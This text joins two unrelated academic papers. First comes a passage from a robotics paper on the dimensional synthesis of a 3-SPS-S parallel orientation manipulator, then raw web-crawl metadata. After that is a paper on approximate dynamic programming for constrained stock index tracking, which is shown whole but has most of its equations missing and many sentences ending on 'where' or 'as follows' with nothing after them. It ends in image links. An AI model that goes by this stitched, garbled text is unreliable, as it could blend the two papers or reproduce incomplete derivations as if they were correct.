extensible limbs denoted byli. Both platforms take the form of a tetrahedron, connected one to each other by a fixed spherical joint at point O. The robot has 3-DoF(φ,θ,ψ)defining the orientation of the moving platform.\n\n(a) (b)\n\nFig. 1: (a) Spatial 3-SPS-S parallel manipulator; (b) Design parameters of the mov-ing platform\n\n(3)\n\nWith respect to the base platform, the fixed spherical joints Ai are located on the principal axes of the fixed frameF{x,y,z}fulfilling|−→OAi|=R, fori=1,2,3. Besides, the spherical joints Bi are located with respect to the moving frame M{u,v,w}(see Fig. 1b) such that:\n\nMb 1=L[0,0,1]T (1) Mb 2=L[b2u,0,b2w]T Mb 3=L[b3u,b3v,b3w]T where b2u=cβ2; b2v=0; b2w=sβ2 (2) b3u=cβ3cγ3; b3v=cβ3sγ3; b3w=sβ3\n\nThe transformation from the moving frame M to the fixed frame F can be achieved by a 3×3 rotation matrixFMRdefined by the three Euler angles. In this case, the Euler angles(φ,θ,ψ)in theirwvwversion will be used.\n\nThe vectorFbi, or simplybi, expressed with respect to the fixed frameF is: bi= [bix,biy,biz]T=FM RMbi (3) On the other hand, the position vector of pointsAiwith respect to the fixed frame F isai= [aix,aiy,aiz]T.\n\nThe loop-closure equation for each limb isli=bi−ai, which results in the fol-lowing system fori=1,2,3:\n\nl2i =a2i +b2i−2aTibi (4)\n\n• Inverse Kinematic Problem: To solve the IKP, the Euler angles are established (φ,θ,ψ)and the length of each limblican be directly obtained from Eq. 4. Only the positive solution yields a physical meaning.\n\n• Direct Kinematic Problem: The DKP consists in solving the outputs(φ,θ,ψ)\n\nonce the three prismatic limb lengths are known. As demonstrated in this manipulator has a maximum of eight solutions to the DKP.\n\n### 2.1 Velocity Problem\n\nSo as to solve the velocity problem the loop-closure equations are differentiated with respect to time, obtaining:\n\nωp×bi=ωi×li+l˙i·si (5)\n\n(4)\n\nwheresiis defined as the unit vector directed fromAitoBi. The moving platform angular velocity is ωp, and ωi corresponds to the angular velocity of each limb li. Dot-premultiplying each term of the system (5) byli, the velocity equation ex-pressed in a matrix form is obtained as:\n\nJDKPωp =JIKPl˙i (6) where JDKP= (b1×l1)T (b2×l2)T (b3×l3)T ; JIKP= l1 0 0 0 l2 0 0 0 l3 (7)\n\nThe inverse Jacobian matrix,JIKP, is singular only whenever any of the prismatic limbs has zero length, which cannot be achieved in practice. Besides, each limb has only one associated working mode. Hence, we focus on the analysis of the DKP singularity locus in the configuration space.\n\n### 2.2 DKP Singularity Locus\n\nThe DKP singularity locus is obtained by computing the nullity of the determinant ofJDKP, which yields:\n\n|JDKP|=−R3L3·sθ·ξ (8)\n\nwhere\n\nξ =c2φcθ(b2w(b3usψ+b3vcψ)−b3w(b2usψ))−c2φsθ(b3vb2u) (9)\n\n+c2ψsθ(b2ub3v) +sθ(cψsψ(b2ub3u))−cθ(b2w(b3usψ+b3vcψ))\n\n+sφcφ(b2w(b3ucψ−b3vsψ)−b3wb2ucψ) Expression|JDKP|factorizes into three terms:\n\n• The constantR3L3does not affect the shape of the DKP singularity locus. Param-etersRandLdefine the size of the robot, and the minimum and maximum stroke of the prismatic limbs. For the example under study, without loss of generality, valuesR=1 andL=0.5 will be assigned.\n\n• The second term corresponds to the function:sθ. So as to avoid the singularity\n\nplanesθ=0 andθ=±π, the intervalθ∈(0,π)will be considered.\n\n• Finally, from Eq. 9 yields the expressionξ. This function depends on the output\n\nvariables (φ,θ,ψ), and on the geometric parameters(β2,γ3,β3). Therefore, the expression\n\n## Author's version\n\nξ will be assessed regarding the dimensional synthesis.\n\n(5)\n\n### 3 Dimensional Synthesis\n\nParameters(β2,γ3,β3)comprise the design parameters subject of study. Different designs will be analyzed, representing and assessing workspace and joint space en-tities.\n\n• Case 1: Similar Platforms\n\nThe first case under study establishes a design of the moving platform such that it is similar to the fixed base. For that, the geometric parameters are:β2=β3=0 and\n\nγ3=90◦. The expression of the DKP singularity locus, given by Eq. 9, yields:\n\nξ=sθ(cψ−cφ)(cψ+cφ) (10)\n\nIt is factorized into the functionsθ, and the product of two planes. These planes divide the workspace(φ,θ,ψ)into eight aspects, soVcase1=VT/8 beingVT the total volume. Each DKP solution lies inside each aspect, non-singular transitions being not possible. This is corroborated with the non-existence of cusp points inside any section of the joint space (see details in , chapter 10).\n\n• Case 2: JointsB2,B3onuv-plane\n\nThe second case under study locates joints B2andB3 on theuv-plane, such that\n\nβ2=β3=0 andγ3varies in the interval(0,90◦). The DKP singularity locus yields:\n\nξ=sθ[b3usψcψ+b3v(c2ψ−c2φ)] (11)\n\nYet again, expression ξ factorizes into the function sθ, and a trigonometric\n\nex-pression depending on outputs (φ,ψ) and coordinatesb3uandb3v, function of the geometric parameterγ3. Let us analyze a design included in Case 2, by assigning\n\nγ3=30◦. The DKP singularity locus is represented in the workspace in Fig. 2a, the joint space and its cross section forl1=const being depicted in Fig. 2b. Contrary to Case 1, only four aspects exist, so that the operational workspace is duplicated Vcase2=2Vcase1=VT/4, because the robot can move between solutions located in-side the same aspect. This is in accordance with the existence of cusp points in joint space sections, as shown in Fig. 2b.\n\nNon-singular transitions can be performed between regions in the workspace where different solutions lie, as for example regions 1 and 2 in the workspace section of Fig. 2c. Though the size of the workspace isVT/4 for all designs in Case 2, its shape varies. It is interesting to search for designs that yield a regular workspace, such that the range of motion of the output variables maintains over the entire workspace. As shown in Fig. 2c, the ratioH=h/rcan be measured and serves as an indicator of regularity. Its evolution depending onγ3is represented in Fig. 2d. It can be observed that small values ofγ3yield a more regular workspace (H≈1). The extreme valuesγ3=0 (planar moving platform) and γ3=90◦ con-stitute particular designs. On the one hand, γ3=0 yields a degeneracy design for which the workspace is formed by planes (H=1) and only 4 DKP solutions exist.\n\n## Author's version\n\n(6)\n\n(a) (b)\n\n(c) (d)\n\nFig. 2: Case 2: DKP singularity locus in the (a) workspace, (b) joint space and (c) workspace section;(d) Ratio of regularityH\n\nValueγ3=90◦coincides with Case 1, and verifiesH=0, no connection between different regions is possible.\n\n• Case 3: General Design\n\nThe last case corresponds to a general design of the moving platform. For this case the three dimensional parameters (β2,γ3,β3) can be assigned any value in the range (0,90◦). The singularity locus is given by expressionξ in Eq. (9), which is plotted in the workspace and joint space in Fig. 3 for a specific design:β2=30◦,γ3=60◦and\n\nβ3=30◦. Some sections of the joint space are also depicted in Fig. 3b, visualizing the existence of cusp points.\n\nThese designs present two aspects, the holes of the singularity surface in the workspace (Fig. 3a) allowing the connection between all solutions having the same sign of|JDKP|. Consequently, the designs of Case 3 exhibit the maximum opera-tional workspace:Vcase3=VT/2. Nevertheless, the shape that the singularity surface acquires in the workspace, and in the joint space, is much more complex.\n\n(7)\n\n(a) (b)\n\n(c) (d)\n\nFig. 3: Case 3: DKP singularity locus in the (a) workspace and (b) joint space; Design parameter space according to indicators (c)R1and (d)R2\n\nIn this sense, similarly to Case 2, some indicators that characterize the shape of the operational workspace can be implemented. Then, parameters (β2,γ3,β3) com-prise thedesign parameter spacein which each point represents a possible design, and has an associated value according to the indicator under evaluation. We propose two indicators. The first,R1, evaluates the regularity, comparing the number of nodes forming the DKP singularity curves among different sections ofθi∈(0,π). The sec-ond indicator,R2, assesses the quality of the curves in eachθisection, penalizing the designs for which the curves cover a larger region. The results are displayed in Figs. 3c and 3d, the blue colored points indicate the geometric parameters corresponding to optimum designs, and the red ones the worst (see details in ).\n\nThe optimum design parameter space can be computed by intersecting the op-timum values of both graphs in Figs. 3c and 3d. Then, any point belonging to the resultant optimum space constitutes a valid design complying with the established requirements. For example, the following design:β2=15◦,γ3=10◦andβ3=20◦ is an optimum design with regular workspace, maintaining a similar pattern of the singularity curves in different sections of the workspace.\n\n(8)\n\n### 4 Conclusions\n\nDimensional synthesis of a spatial orientation manipulator has been approached, fo-cusing mainly on the configuration space entities. Analyzing different designs, it has been shown that the ones capable of transitioning between solutions exhibit a larger workspace. Not only the size of the operational workspace but the evaluation of its shape has been also considered, representing the design parameter space according to the different requirements. Then the designer can choose any point belonging to the set of optimum values achieved. The proposed procedure is valid for 3-DoF planar or spatial parallel manipulators that exhibit the transitioning ability.\n\n### Acknowledgment\n\nThe authors wish to acknowledge the financial support received from Ministerio de Econom´ıa y Competitividad (Project DPI2011- 22955), the European Union (Project FP7-CIP-ICT-PSP-2009-3) and Basque Government, Dpto. Educ., Univ. e Investig. (Project IT445-10) and UPV/EHU under program UFI 11/29.\n\n### References\n\n1. Altuzarra, O., Pinto, C., Sandru, B., Hern´andez, A.: Optimal Dimensioning for Parallel Ma-nipulators: Workspace, Dexterity and Energy. ASME Journal of Mechanical Design133(4), 041,007–7 (2011)\n\n2. Bonev, I., Rhyu, J.: A geometrical method for computing the constant-orientation workspace of 6-PRRS parallel manipulators. Mechanism and Machine Theory36, 1–13 (2001) 3. Gosselin, C., Angeles, J.: A global performance index for the kinematic optimization of\n\nrobotic manipulators. Journal of Mechanical Design113(3), 220–226 (1991)\n\n4. Husty, M.: Non-singular assembly mode change in 3-RPR-parallel manipulators. In: Compu-tational Kinematics, (Eds. Kecskem´ethy, A., M¨uller, A), Springer (2009)\n\n5. Liu, X.J., Guan, L., Wang, J.: Kinematics and Closed Optimal Design of a Kind of PRRRP Parallel Manipulator. ASME Journal of Mechanical Design129(5), 558563. (2007) 6. Merlet, J.P.: Designing a parallel manipulator for a specific workspace. International Journal\n\nof Robotics Research16(4), 545–556 (1997)\n\n7. Monsarrat, B., Gosselin, C.: Workspace Analysis: and Optimal Design of a 3-Leg 6-DOF Par-allel Platform Mechanism. IEEE Trans. on Robotics and Automation19(6), 954–966 (2003) 8. Ottaviano, E., Ceccarelli, M.: An Analytical Design for CaPaMan with Prescribed Position and\n\nOrientation. In: Proc. of the ASME Design Engineering Technical Conference and Computers and Information in Engineering Conference, Baltimore (2000)\n\n9. Ur´ızar, M.: Methodology to Enlarge the Workspace of Parallel Manipulators by Means of Non-singular Transitions. Ph.D. thesis, University of the Basque Country (UPV/EHU). http://www.ehu.es/compmech/members/monica-urizar/research/ (2012)\n\n10. Ur´ızar, M., Petuya, V., Altuzarra, O., Hern´andez, A.: Assembly Mode Changing in the Cuspi-dal Analytic 3-RPR. IEEE Transactions on Robotics28(2), 506–513 (2012)\n\n11. Zein, M., Wenger, P., Chablat, D.: Non-singular assembly mode changing motions for 3-RPR parallel manipulators. Mechanism and Machine Theory43 (4), 480–490 (2008)\n\nUpdating...\n\n## References\n\nUpdating...\n\nRelated subjects :"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8269957,"math_prob":0.92485464,"size":15169,"snap":"2021-04-2021-17","text_gpt3_token_len":4084,"char_repetition_ratio":0.139334,"word_repetition_ratio":0.014838129,"special_character_ratio":0.23646912,"punctuation_ratio":0.15636486,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9537152,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-23T01:57:20Z\",\"WARC-Record-ID\":\"<urn:uuid:cf294129-e57b-4e03-bd4e-720d5fdf3985>\",\"Content-Length\":\"225995\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:89947313-034b-4baa-a222-199417ca7cb8>\",\"WARC-Concurrent-To\":\"<urn:uuid:ba81e3eb-7e59-42fa-ba99-ab8771fffc80>\",\"WARC-IP-Address\":\"138.197.149.215\",\"WARC-Target-URI\":\"https://1library.net/document/q77930kq-dimensional-synthesis-spatial-orientation-parallel-manipulator-characterizing-configuration.html\",\"WARC-Payload-Digest\":\"sha1:7AXRTMWCCNA34EZB7DQ7N7UZGN2M6XDS\",\"WARC-Block-Digest\":\"sha1:ROWBBM6JC2O656IWCFVOH2ME3U7HBFHN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618039626288.96_warc_CC-MAIN-20210423011010-20210423041010-00178.warc.gz\"}"} |
http://oak.go.kr/central/journallist/journaldetail.do?article_seq=12335 | [
"Approximate Dynamic Programming-Based Dynamic Portfolio Optimization for Constrained Index Tracking\n\n•",
null,
"• ABSTRACT\n\nRecently, the constrained index tracking problem, in which the task of trading a set of stocks is performed so as to closely follow an index value under some constraints, has often been considered as an important application domain for control theory. Because this problem can be conveniently viewed and formulated as an optimal decision-making problem in a highly uncertain and stochastic environment, approaches based on stochastic optimal control methods are particularly pertinent. Since stochastic optimal control problems cannot be solved exactly except in very simple cases, approximations are required in most practical problems to obtain good suboptimal policies. In this paper, we present a procedure for finding a suboptimal solution to the constrained index tracking problem based on approximate dynamic programming. Illustrative simulation results show that this procedure works well when applied to a set of real financial market data.\n\n• KEYWORD\n\nApproximate dynamic programming , Dynamic portfolio optimization , Stochastic control , Constrained index tracking , Financial engineering\n\n• 1. Introduction\n\nRecently, a large class of financial engineering problems dealing with index tracking and portfolio optimization have been considered as an important application domain for several types of engineering and applied mathematics principles [1-8]. Because this class can be conveniently viewed and formulated as an optimal decision-making problem in a highly uncertain and stochastic environment, particularly pertinent to this problem are approaches based on stochastic optimal control methods. The stock index tracking problem is concerned with constructing a stock portfolio that mimics or closely tracks the returns of a stock index such as the S&P 500. Stock index tracking is of practical importance since it is one of the important methods used in a passive approach to equity portfolio management and to index fund management. To minimize tracking error against the target index, usually full replication, in which the stocks are held according to their own weights in the index, or quasi-full replication is adopted by the fund managers. An exchange traded fund (ETF) is a good example of such portfolio management since it is constructed according to its own portfolio deposit file (PDF). Such a full replication or quasi-full replication can be very costly owing to transaction and fund administration costs. The constrained index tracking considered in this paper is concerned with tracking a stock index by investing in only a subset of the stocks in the target index under some constraints. Because it uses only a subset of the stocks and is expected to dramatically reduce the management costs involved in index tracking and simplify portfolio rebalancing more effectively, this problem is particularly important to portfolio managers . Successfully constrained index tracking is also expected to increase the liquidity of an ETF since we may be able to construct the same ETF without investing in the same quantity of stocks in its PDF. To achieve good tracking performance with a subset of stocks in the index, several methods (e.g., control theory [1,4], use of genetic algorithms , and evolutionary methods ) have been studied by researchers.\n\nIn this paper, we consider the use of approximate dynamic programming (ADP) for solving the constrained index tracking problem. Recently, the use of ADP methods has become popular in the area of stochastic control [9-12]. As is well known, solutions to optimally controlled stochastic systems can be well explained by using dynamic programming (DP) [9,10]. However, stochastic control problems cannot be solved by DP exactly except in very simple cases, and to obtain good suboptimal policies, many studies rely on ADP methods. ADP methods have been successfully applied to many real-world problems , including some financial engineering problems such as portfolio optimization [5,11,12]. The main objective of this paper is to extend the use of ADP to the field of index tracking. More specifically, we (slightly) modify a mathematical formulation of the constrained index tracking problem in [1,4] and establish an ADP-based procedure for solving the resultant stochastic state-space control formulation. Simulation results show that this procedure works well when applied to real financial market data.\n\nThe remainder of this paper is organized as follows: In Section 2, preliminaries are provided regarding constrained index tracking and ADP. In Section 3, we describe our main results from an ADP-based control procedure for the constrained index tracking problem. In Section 4, the effectiveness of the ADPbased procedure is illustrated by using real financial market data. Finally, in Section 5, concluding remarks are presented.\n\n2. Preliminaries\n\nIn this paper, we examine constrained index tracking based on ADP. In the following, we describe some fundamentals regarding constrained index tracking and ADP.\n\n2.1 Constrained Index Tracking Problem\n\nIn this section, we describe a constrained index tracking problem [1,4], in which an index of stocks is tracked with a subset of these stocks under certain constraints, as a stochastic control problem. We consider the index I(t) defined as a weighted average of n stock prices, s1(t), · · · , sn(t). Note that the stock prices are generally modeled as correlated geometric Brownian motions [1,14], i.e.,\n\nwhere\n\nis the drift of the ith stock, and\n\nis a vector Brownian motion satisfying\n\nBy performing discretization using the Euler method with time step Δt, one can transform Eq. (1) into the following discretetime asset dynamics :\n\nwhere\n\nNote that with\n\nwe have\n\nFurther, note that with\n\nthe index value defined by a weighted average can be expressed as\n\nfor some αRn satisfying αi ≥ 0, ∀i ∈ {1,· · · , n}, and\n\nWithout loss of generality, in this paper we assume\n\ni.e., the index I(t) is assumed to be the equally weighted average of the stock prices. Under this assumption, we have\n\nExtending the results of this paper to a general α case will be straightforward. The continuous dynamics for the risk-free asset (e.g., the continuous time bond) can be modeled by\n\nwhere\n\nis the risk-free rate . When the time step is Δt, its discretized version can be written as\n\nwhere\n\n. We assume that the money amounts of the first m < n stocks, y1(t), · · · , ym(t), and the amount of the risk-free asset, yC(t), consist of our portfolio vector y(t) at time t, i.e.,\n\nNote that it is the total value of this portfolio vector that should track the index value over time. More precisely, our goal is to let the wealth of our portfolio,\n\napproach sufficiently close to the index value I(t) = αTs(t) as t → ∞ by performing appropriate trades, U1(t), · · · um(t) and uC(t) for the first m stocks and the risk-free asset, respectively, at the beginning of each time step t. Hence, a solution to the constrained index tracking problem can be found by considering the following optimization problem:\n\nwhere γ (0, 1) is a discount factor, dist(a, b) is the distance between a and b, and Ct is a constraint set. Details about the distance function, dist(a, b), and the constraint set, Ct, are presented in Section 3.\n\n2.2 Approximate Dynamic Programming\n\nDynamic programming (DP) is a branch of control theory concerned with finding the optimal control policy that can minimize costs in interactions with an environment. DP is one of the most important theoretical tools in the study of stochastic control. A variety of topics on DP and stochastic control have been well addressed in [9-12]. In the following, some fundamental concepts on stochastic control and DP are briefly summarized. For more details, see, e.g., . A large class of stochastic control problems deal with dynamics described by the following state equation:\n\nwhere x(t) ∈ X is the state vector, u(t) ∈ u is the control input vector, and w(t) ∈ W is the process noise vector. Here, the noise vectors w(t) are generally assumed to be independent and identically distributed (IID). Many stochastic control problems are concerned with finding a time-invariant state-feedback control policy\n\nthat can optimize a performance index function. A widely used choice for the performance index function of infinite-horizon stochastic optimal control problems is the expected sum of discounted stage costs, i.e.,\n\nwhere (· , ·) is the stage cost function. By minimizing this performance index function over all admissible control polices : Xu, one can find the optimal value of J. This minimal performance index value is denoted by J*, and an optimal state-feedback function achieving the minimal value is denoted by *. The state value function V*(z) is defined as the optimal performance index value conditioned on the initial state x(0) = z, i.e.,\n\nAccording to optimal control theory [9,10], the state value function V* : XR is the unique fixed point of the Bellman equation\n\nand an optimal control policy * : Xu can be found by\n\nIn its operator form, the Bellman equation can be written as\n\nwhere T is the operator (whose domain and codomain are both function spaces mapping X into R ? {∞}) defined as\n\nfor any V : XR ? {∞}. The operator T for the Bellman equation is called the Bellman operator (see, e.g., ). As is well known, the state value function V* and the corresponding optimal control policy * cannot be solved exactly except in simple special cases [9,11]. An efficient strategy when finding the exact state value function is impossible is to rely on an approximate state value function\n\nBy applying this strategy to Eq. (20), one can find a suboptimal control policy ads : Xu via\n\nIn this paper, we apply this ADP strategy to the constrained index tracking problem.\n\nIn this section, we describe constrained index tracking in the framework of a stochastic state-space control problem, and we present an ADP-based procedure to find a suboptimal solution to the problem. To express the constrained index tracking problem in a state-space optimal control format, we need to define the control input and state vector together with the performance index that is used as an optimization criterion. The control input we consider for the constrained index tracking problem is a vector of trades,\n\nexecuted for the portfolio\n\ny(t)?[y1(t),· · · , ym(t); yC(t)]T\n\nat the beginning of each time step t. Note that ui(t) represents buying or selling assets. That is, by ui(t) ? 0, we mean buying the asset associated with yi(t), and by ui(t) ? 0, we mean selling it. For a state-space description of the constrained index tracking problem, we define the state vector as\n\nWith these state and input definitions, the state transition of Eq. (14) can be described by the following state equation:\n\nwhere\n\nAs in , we assume that our stock prices are all normalized in the sense that initially they start from\n\nA commonly used distance function for index tracking is the squared tracking error , i.e.,\n\nNote that in this performance index function, both I(t) and w(t) are defined by means of the entries of the state vector x(t). For the initial portfolio, we take\n\nwhich means that the tracking portfolio starts from the all-cash initial condition with a unit magnitude. With the above statespace description, the problem of optimally tracking the index, I(t), with the wealth of the tracking portfolio, w(t) = 1T y(t), over the infinite horizon can be expressed as the following optimization problem:\n\nIn solving this index tracking problem, the tracking portfolio y(t) and the control input u(t) should satisfy certain constraints that arise naturally (e.g., no short selling or no overweighting in a certain sector [1,4]). The first constraint we consider in this paper is the so-called self-financing condition,\n\nwhich means that the total money obtained from selling should be equal to the total money required for buying. Next, we impose a nonnegativity (i.e., long-only) condition for our tracking portfolio, i.e.,\n\nfor ∀i ∈ {1, · · · , m}, ∀t ∈ {0, 1, · · · }. As a final set of constraints, in this paper we consider the following allocation upper bounds:\n\nwhere the κi fixed positive constants less than 1. By constraint #3, we mean that the fraction of the wealth invested in the m risky assets (i.e., stocks) should not be larger than κ1. Also, constraint #4 sets a similar upper bound on specific stocks belonging to the set J. From these steps, the constrainedindex-following problem can now be expressed as the following stochastic control problem:\n\nwhere I(t) = (1/n)1Ts(t), w(t) = 1T y(t), and x(t) = [sT(t), yT (t)]T. Note that this formulation is a (slight) modification of the one used in [1,4], and the state vector x(t) = [s(t)T, y(t)T]T here contains (slightly) richer information compared to the original one [1,4], which uses the stock prices and the total wealth of the tracking portfolio only. To solve the above constrained index tracking problem via ADP, we utilize the iterated-Bellman-inequality strategy proposed by Wang, O’Donoghue, and Boyd [11,12]. In the iterated-Bellmaninequality strategy, convex quadratic functions\n\nare used for approximating state value functions, and letting parameters of the\n\nsatisfy a series of Bellman inequalities\n\nwith\n\nguarantees that\n\nis a lower bound of the optimal state value function V* [11,12].\n\nIn this paper, we obtain an ADP-based solution procedure for the constrained index tracking problem of Eq. (36) utilizing the iterated-Bellman-inequality strategy [11,12]. To compute the stage cost, we note that since the initial stock prices and the initial cash amount are both normalized (i.e., s1(0) = · · · = sn(0) = 1 and yC(0) = 1), the initial tracking error I(0) - W(0) is equal to zero. Hence, the performance index can be equivalently written as\n\nFor simplicity and convenience, we use the first term on the right-hand side of Eq. (39) as our new performance index function, i.e.,\n\nNow we consider the tracking error at time t + 1 conditioned on x(t) = z and u(t) = v. For notational convenience, we let z ? [sT, yT]T , and we define sa, sb, ya, and va as follows: sa ? [s1, · · · , sm]T, sb ? [sm+1 · · · , sn]T, ya ? [y1, · · · , ym]T, and va ? [v1, · · · , vm]T. Note that, with these definitions, we have\n\nThen the tracking error I(t + 1) ? W(t + 1) conditioned on x(t) = z and u(t) = v satisfies the following:\n\nBased on this equality, one can obtain an expression for the stage cost, i.e., the expectation of the squared tracking error at time step (t + 1) conditioned on\n\nas follows:\n\nwhere\n\nNote that here the μi and the Σij are the block components of μ and Σ, respectively, i.e.,\n\nNow we let the derived matrix variables Gi, i = 1, · · · , M, satisfy the following:\n\nHere, the expectation in the right-hand side is equal to\n\nThen, by evaluating the right-hand side of Eq. (47), we obtain\n\nwhere\n\nIn Eq. (49), the Pi,jk and the pi,j are the block components of Pi and pi, respectively, i.e.,\n\nand ? denotes the elementwise product.\n\nNote that the constraints considered in this paper are all linear. Hence, the left-hand sides of our constraints can be expressed as\n\nMore specifically, the first constraint can be written as\n\nwhere E(1) = 11×(m+1) and F(1) = 01×(n+m+1). Further, the linear inequality constraints can be given in the form\n\nwhere\n\nNote that, in Eq. (54), the allocation constraint set J is described by {j1, · · · , j|J|}, where |J| is the number of entries in J . Also, note that here ej means the jth column of the identity matrix Im. With all these constraints required for the input-state pair (v, z), the resultant constrained Bellman inequality condition becomes the following: Whenever (v, z) satisfies\n\nwe must have\n\nwhere Si?1 is the derived matrix variable defined by\n\nFinally, note that one can obtain the following sufficient condition for the constrained Bellman inequality requirement in Eqs. (55) and (56) using the S procedure :\n\nwhere the\n\nare S-procedure multipliers (with appropriate dimensions) , and\n\nBy combining all the above steps together, the process of finding a suboptimal ADP solution to the constrained index tracking problem can be summarized as follows:\n\n[Procedure]\n\nPreliminary steps:\n\n1. Choose the discount rate γ and the allocation upper bounds κ1 and κ2.\n\n2. Estimate μ, Σ, and rf .\n\nMain steps:\n\n1. Initialize the decision-making time t = 0, and let x(0) = [1, · · · , 1, 0, · · · , 0, 1].\n\n2. Compute the stage cost matrix L of Eq. (43) and the Λ(k) of Eq. (59).\n\n3. Observed the current state x(t), and set z = x(t).\n\n4. Define LMI variables:\n\n(a) Define the basic LMI variables, Pi, pi, and qi of Eq. (37).\n\n(b) Define the derived LMI variables, Gi of Eq. (48) and Si of Eq. (57).\n\n(c) Define the S-procedure multipliers,\n\nof Eq. (58).\n\n5. Find an approximate state value,\n\nby solving the following LMI optimization problem:\n\n6. Obtain the ADP control input, u(t), as the optimal solution V* of the following quadratic program:\n\n7. Proceed to the next time step, i.e., t ← (t + 1).\n\n8. (optional) If necessary, update μ, Σ, and rf .\n\n9. Go to step 2.\n\n4. An Example\n\nIn this section, we illustrate the presented ADP-based procedure with an example of , which dealt with daily prices of five major stocks from November 11, 2004, to February 1, 2008. The index I(t) in the example was defined based on IBM, 3M, Altria, Boeing, and AIG (the ticker symbols of which are IBM, MMM, MO, BA, and AIG, respectively). Their stock prices during the considered test period are shown in Figure 1.\n\nAs the subset comprising the tracking portfolio, the first three stocks, s1, s2, and s3 (i.e., IBM, MMM, and MO) were chosen. Note that n = 5 and m = 3 in this example. During the test period, the ADP-based tracking portfolio was updated every 30 trading days. In this update, the mean return vector μ and the covariance matrix Σ were estimated by averaging the past daily raw data via the exponentially weighted moving average (EWMA) method with the decay factor λ = 0:999. For the riskfree rate, we assumed\n\nas in . Between each 30-day update, the number of shares in the tracking portfolio remained the same. The ADP discount factor was chosen as γ = 0:99.",
null,
"",
null,
"As described in Section 3, the performance index function was computed based on the mean-square distance between the index and the portfolio wealth. Finally, the allocation upper bound was considered for the first stock (i.e., J ={IBM}).",
null,
"",
null,
"",
null,
"",
null,
"We considered two scenarios with different constraints (Table 1). As shown in Table 1, trading has more severe constraints as the scenario number increases. In the first scenario, we traded with fundamental requirements (i.e., self-financing and a nonnegative portfolio) and the total allocation bound constraint (i.e., Constraint #3). For the upper bound constant for constraint #3, we used κ1 = 0:8. This bound means that the total investment in the three stocks (IBM, MMM, and MO) was required to be less than or equal to 80% of the total portfolio value. The control inputs obtained by the ADP procedure are shown in Figure 2. Applying these control inputs, we obtained the simulation results of Figures 3-5. Figure 3 shows that the ADP-based portfolio followed the index closely in Scenario #1. Figure 4 shows that the 80% upper bound condition for the total allocation in stocks was well respected by the ADP policy in Scenario #1. The specific portion of each stock in the tracking portfolio is shown in Figure 5.\n\nThis figure, together with Figure 2, shows that the control inputs changed the initial cash-only portfolio rapidly into the stock-dominating positions for successful tracking.\n\nIn the second scenario, more difficult constraints were imposed. More specifically, the κ1 value was reduced to 0:7, and the allocation in the first stock (i.e., IBM) was required not to exceed 20% of the total portfolio wealth. The control inputs and simulation results for Scenario #2 are shown in Figures 6-9.\n\nThese figures show that, although the tracking performance was a little degraded owing to the additional burden, the wealth of the ADP-based portfolio followed the trend of the index most of the time reasonably well with all the constraints being respected.",
null,
"",
null,
"",
null,
"",
null,
"5. Concluding Remarks\n\nThe constrained index tracking problem, in which the task of trading a set of stocks is performed so as to closely follow an index value under some constraints, can be viewed and formulated as an optimal decision-making problem in a highly uncertain and stochastic environment, and approaches based on stochastic optimal control methods are particularly pertinent. Since stochastic optimal control problems cannot be solved exactly except in very simple cases, in practice approximations are required to obtain good suboptimal policies. In this paper, we studied approximate dynamic programming applications for the constrained index tracking problem and presented an ADP-based index tracking procedure. Illustrative simulation results showed that the ADP-based tracking policy successfully produced an index-tracking portfolio under various constraints. Further work to be done includes more extensive comparative studies, which should reveal the strengths and weaknesses of the ADP-based index tracking, and applications to other types of related financial engineering problems.\n\n> Conflict of Interest\n\n• [Figure 1.] Normalized stock prices from November 11, 2004, to February 1, 2008.",
null,
"• [Table 1.] Simulation scenarios",
null,
"• [Figure 2.] Control inputs (Scenario #1).",
null,
"• [Figure 3.] Index vs. wealth of the tracking portfolio (Scenario #1).",
null,
"• [Figure 4.] Total percent allocation in stocks (Scenario #1).",
null,
"• [Figure 5.] Percent allocations in stocks and cash (Scenario #1).",
null,
"• [Figure 6.] Control inputs (Scenario #2).",
null,
"• [Figure 7.] Index vs. wealth of the tracking portfolio (Scenario #2).",
null,
"• [Figure 8.] Total percent allocation in stocks (Scenario #2).",
null,
"• [Figure 9.] Percent allocations in stocks (Scenario #2).",
null,
""
] | [
null,
"http://oak.go.kr/central/images/2015/cc_img.png",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f001.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_t001.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f002.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f003.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f004.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f005.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f006.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f007.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f008.jpg",
null,
"http://oak.go.kr//repository/journal/12335/E1FLA5_2013_v13n1_19_f009.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f001.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_t001.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f002.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f003.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f004.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f005.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f006.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f007.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f008.jpg",
null,
"http://oak.go.kr/repository/journal/12335/E1FLA5_2013_v13n1_19_f009.jpg",
null
